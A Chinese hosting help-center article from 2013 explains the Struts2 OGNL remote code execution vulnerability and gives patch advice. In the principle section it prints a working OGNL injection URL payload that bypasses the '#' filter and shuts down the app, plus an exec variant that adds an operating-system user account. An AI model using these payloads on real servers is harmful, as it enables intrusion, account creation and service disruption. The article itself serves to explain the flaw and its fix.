当前位置:万网互联首页 > 帮助中心 > 阅读:

struts2漏洞原理及解决办法

struts2漏洞原理及解决办法

 
分享到:
 
发布时间:2013-7-19 9:52:14
 

 


Struts2被曝存在重大远程任意代码执行安全漏洞,影响Struts2全系版本。而对于此次堪比棱镜事件的危害,安全宝指出,众多大型互联网厂商均存在该漏洞,且影响厂商仍在扩大之中。同时漏洞利用代码已经被强化,可直接通过浏览器的提交对服务器进行任意操作并获取敏感内容。目前安全宝用户暂可高枕无忧。同时也建议使用Struts开源架构的网站用户尽快加入安全宝云体系,以保护网站免受漏洞的威胁。
  据悉,Struts2漏洞由网安全宝在昨日率先拦截到其攻击,漏洞涉及Struts2.0及以上的版本,是一个远程命令执行漏洞和开放重定向漏洞。利用漏洞,黑客可发起远程攻击,不但可以窃取网站数据信息,甚至还可取得网站服务器控制权。而且,目前针对此漏洞的自动化工具开始出现,攻击者无需具备与漏洞相关的专业知识即可侵入服务器,直接执行命令操作,盗取数据甚至进行毁灭性操作。
  安全宝联合产品副总裁吴翰清指出:“Struts2是一个帮助java开发者利用j2ee开发Web应用的开发框架,作为网站开发的底层通用模板,在大型互联网企业、政府、金融机构等网站建设中应用广泛。因此,此次Struts 2远程执行漏洞,将会威胁很多规模型网站。如今,开源架构下漏洞频频爆出,并且大多属于突发性威胁、爆发迅速快、波及范围广,这警示网站安全必须由一次性维护转向即时关注,以应对层出不穷的网站安全威胁。”
  为了防范攻击者可能利用此漏洞发起的攻击,安全宝提醒广大网站管理员,应该尽快采取如下措施:
  1、DNSPOD的用户直在DNSPOD域名管理列表中开启安全中心,即可一键防御攻击。
  2 、从Struts2的官方网站下载最新的补丁程序,并尽快将Struts 2升级到最新的2.3.15.1版本,避免遭遇严重的安全攻击(下载地址http://struts.apache.org/download.cgi#struts23151)。鉴于Struts 2至今为止已经多次曝出严重的高危漏洞,如果不是必要,建议开发者以后考虑采用其它类似的Java开发框架。
 
1、原理
Struts2的核心是使用的webwork框架,处理 action时通过调用底层的getter/setter方法来处理http的参数,它将每个http参数声明为一个ONGL(这里是ONGL的介绍)语句。当我们提交一个http参数:
?user.address.city=Bishkek&user['favoriteDrink']=kumys
ONGL将它转换为:
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
这是通过ParametersInterceptor(参数过滤器)来执行的,使用用户提供的HTTP参数调用 ValueStack.setValue()。
为了防范篡改服务器端对象,XWork的ParametersInterceptor不允许参数名中出现“#”字符,但如果使用了Java的 unicode字符串表示\u0023,攻击者就可以绕过保护,修改保护Java方式执行的值:
 
此处代码有破坏性,请在测试环境执行,严禁用此种方法进行恶意攻击
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
 
转义后是这样:
?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1
 
OGNL处理时最终的结果就是
java.lang.Runtime.getRuntime().exit(1); //关闭程序,即将web程序关闭
类似的可以执行
java.lang.Runtime.getRuntime().exec("net user 用户名 密码 /add");//增加操作系统用户,在有权限的情况下能成功(在URL中用%20替换空格,%2F替换/)
只要有权限就可以执行任何DOS命令。
2、解决方法
网上很多文章都介绍了三种解决方法,个人觉得将struts2的jar包更新到最新版本最简单,不用更改任何程序代码,目前最新版本2.3.4
下载到的更新包中有很多jar包,我系统中主要用到以下几个替换掉旧版本的:
commons-lang3-3.1.jar (保留commons-lang-2.6.jar)
javassist-3.11.0.GA.jar (新加包)
ognl-3.0.5.jar (替换旧版本)
struts2-core-2.3.4.1.jar (替换旧版本)
xwork-core-2.3.4.1.jar (替换旧版本)
 

 

 
关于万网互联
联系我们
关于我们
本站通知
行业新闻
 
[更多]域名相关问题
如何申请域名
万网域名解析详图
中频域名解析详图
新网域名解析详图
解析后打不开网站分析
 
[更多]主机相关问题
如何申请虚拟主机?
如何管理我的虚拟主机?
虚拟主机基本常识
 
[更多]服务器/VPS相关问题
VPS如何远程管理 ?
VPS使用说明?
Vps上站点常见问题解答
 
[更多]邮局相关问题
怎么样申请企业邮局?
如何管理我的邮局?
FOXMAIL或OUTLOOK怎样收发邮件
企业邮局基本知识
 
[更多]其他帮助主题
ICP备案注意事项
虚拟主机备案填写内容
万网空间备案说明
解决“备案网站打不开”的办法
备案被拒绝原因及处理办法集锦
网站备案之典型问题指南
 
首 页 |  关于我们 |  网站地图 |  代理加盟 |  咨询反馈 |  文档中心 |  价格总览 |  付款方式 | |  联系我们

地址:厦门市思明区软件园二期望海路65号之二A905单元  

电话:400-006-2195 企业QQ:800062195 (服务时间上午9:00-12:00 下午13:00-18:00) 投诉:点击投诉

万网互联代理域名注册机构:阿里云计算有限公司/成都西维数码科技有限公司/上海有孚网络股份有限公司

江苏邦宁科技有限公司/商中在线科技股份有限公司/企商在线(北京)网络股份有限公司

厦门三五互联科技有限公司/北京新网数码信息技术有限公司/上海美橙科技信息发展有限公司

腾讯云计算(北京)有限责任公司/厦门纳网科技有限公司/郑州易方科贸有限公司

万网互联代理空间:万网空间/美橙空间/西数空间/景安空间

信息产业部备案:苏ICP备14056369号 苏公网安备 32021102001516号

Copyright © 2001-2024 万网互联 All Rights Reserved. 执行:15.625毫秒

万网互联是万网在山东的核心代理商,主要经营万网域名万网空间万网邮箱,并销售新网域名中频域名新互域名

ICANN注册商委任协议规定之注册人权利与责任 万网互联代理合同


不良信息举报中心
经营性网站备案信息 可信网站